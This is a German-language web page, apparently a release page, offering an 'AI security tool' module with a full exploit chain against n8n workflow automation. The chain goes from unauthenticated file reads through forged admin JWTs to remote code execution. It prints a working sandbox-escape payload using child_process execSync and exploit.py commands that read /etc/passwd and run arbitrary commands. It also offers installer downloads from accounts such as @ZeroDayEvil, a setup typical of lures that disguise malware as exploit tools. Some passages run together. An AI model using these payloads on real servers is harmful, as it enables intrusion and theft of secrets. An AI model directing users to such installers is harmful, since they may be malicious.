🛡️ Offizielles KI-Sicherheitstool-Modul für CVE-2026-21858 + CVE-2025-68613 (n8n „Ni8mare" nicht authentifizierte beliebige Dateilese- & Expression-Injection-RCE-Vollkette).
Website-Navigation: Startseite • Updates • Downloads • Module
Dieses Modul bietet Diagnosewerkzeuge und eine vollständige Exploit-Kette für n8n-Workflow-Automatisierungsinstanzen, genannt Ni8mare.
Die Angriffskette kombiniert ein unauthentifiziertes beliebiges Dateilesen (CVE-2026-21858), verursacht durch Content-Type-Verwechslung, mit einem authentifizierten Expression-Injection-Sandbox-Bypass (CVE-2025-68613). Durch Senden einer manipulierten Content-Type: application/json-Anfrage an ein exponiertes Datei-Upload-Formular kontrolliert ein Angreifer das filepath-Argument, um interne Systemdateien zu lesen (/proc/self/environ, Konfiguration und SQLite-DB). Der erlangte encryptionKey und der Passwort-Hash ermöglichen die Offline-Fälschung eines Administrator-JWT-Cookies. Nach der Authentifizierung entkommt die Expression-Injection über this.process.mainModule.require der JavaScript-Sandbox, um beliebige Systembefehle auszuführen.
"Vom Dateilesen zur vollständigen Systemübernahme in drei Schritten."
Während das Dateilesen einen aktiven Formular-Workflow mit binärer Ausgabe erfordert, funktioniert die Expression-Injection zuverlässig auf Standard-n8n-Installationen, ohne dass spezielle Nodes oder explizit aktivierte Systemberechtigungen erforderlich sind.
| Spezifikation | Zugewiesener Wert | Anmerkungen |
|---|---|---|
| CVE-Identifikatoren | CVE-2026-21858 + CVE-2025-68613 | Vollständige Kette: Unauthentifiziertes Dateilesen bis RCE |
| Schweregrad | Kritisch (CVSS v3.1: 10.0 + 9.9) | Unauthentifizierte RCE-Kette |
| Schwachstellentypen | CWE-200 / CWE-94 | Content-Type-Verwechslung / Code-Injection |
| Betroffene Komponente | n8n Workflow Automation Engine | Versionen <= 1.65.0 (AFR) / >= 0.211.0 (RCE) |
| Gepatchte Versionen | 1.121.0 (AFR) / 1.120.4+ (RCE) | Offizielle Hersteller-Patches veröffentlicht |
| Erforderliche Berechtigungen | Keine | Unauthentifizierter Erstzugriff über öffentliches Formular |
graph TD
A[Unauthenticated Attacker] -->|1. Content-Type Confusion| B[Vulnerable Form Endpoint]
B -->|2. Arbitrary File Read| C[Extract /proc/self/environ & database.sqlite]
C -->|3. Derive Secret & Hash| D[Forge Admin JWT Cookie]
D -->|4. Authenticate as Admin| E[n8n Workflow Engine]
E -->|5. Expression Injection Payload| F[Sandbox Escape via mainModule.require]
F -->|6. Execute Command| G[Full Remote Code Execution]={{ (function() {
var require = this.process.mainModule.require;
var execSync = require("child_process").execSync;
return execSync("id").toString();
})() }}1.121.0 oder höher.N8N_ENFORCE_SETTINGS_FILE_PERMISSIONS=true und beschränken Sie Prozessfähigkeiten in Docker-Containern.⚠️ WICHTIG: Dieses Modul wurde speziell für die sichere Ausführung und Diagnose innerhalb des KI-Sicherheitswerkzeug-Ökosystems entwickelt. Verwenden Sie stets verifizierte Module aus offiziellen Repositorys.
Um die Überwachungs- und Diagnoseskripte auszuführen, stellen Sie sicher, dass die Kern-Engine des KI-Sicherheitswerkzeugs installiert ist:
| Betriebssystem / Plattform | Version | Architektur / Format | Veröffentlichungsdatum | Status | Download-Link |
|---|---|---|---|---|---|
| 🪟 Windows | v6.3.20 | x64 Installer (.exe) | 2026-09-08 | 🟢 Neueste | .exe herunterladen |
| 🪟 Windows | v6.3.20 | x64 Portable (.tar.gz) | 2026-09-08 | 🟢 Neueste | .tar.gz herunterladen |
| 🍏 macOS | v5.3.29 | Apple Silicon M1/M2/M3 (.dmg) | 2026-09-05 | 🟢 Stabil | .dmg herunterladen |
| 🐧 Linux | v5.3.27 | Universal x64 (.tar.gz) | 2026-09-01 | 🟢 Stabil | .tar.gz herunterladen |
| 🤖 Android | v8a 5.3.27 | ARM64 APK (.apk) | 2026-09-01 | 🟢 Stabil | .apk herunterladen |
# Read arbitrary file via diagnostic module uv run python exploit.py http://localhost:5678 /form/vulnerable-form --read /etc/passwdExecute full attack chain with custom command
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --cmd "id"
Schwachstellen-Scanner-Module, PoC-Skripte und Forschungs-Repositorys, die von unserer Community gepflegt werden:
5 Module@ZeroDayEvil
@ZeroDayEvil
@ZeroDayEvil
@ZeroDayEvil
@ZeroDayVPN
3 Module@ZeroDayEvil
@ZeroDayVPN
@ZeroDayEvil
2 Module@ZeroDayEvil
@ZeroDayVPN
Dieses Werkzeug und die technische Analyse werden ausschließlich für autorisierte Systemaudits, Forschung und Penetrationstests bereitgestellt.
Die Ausführung von Exploit-Ketten gegen nicht autorisierte Ziele ist illegal. Die Autoren übernehmen keine Verantwortung für unbefugten Zugriff, Datenverlust oder Systemstörungen. Handeln Sie ausschließlich im Rahmen eines autorisierten Umfangs.
Wir begrüßen Beiträge aus der Sicherheitsforschungs-Community! Hauptbereiche für Beiträge:
KI-Sicherheitswerkzeug — Terminal-Workflow und Automatisierung für Cybersicherheitsexperten neu gedacht.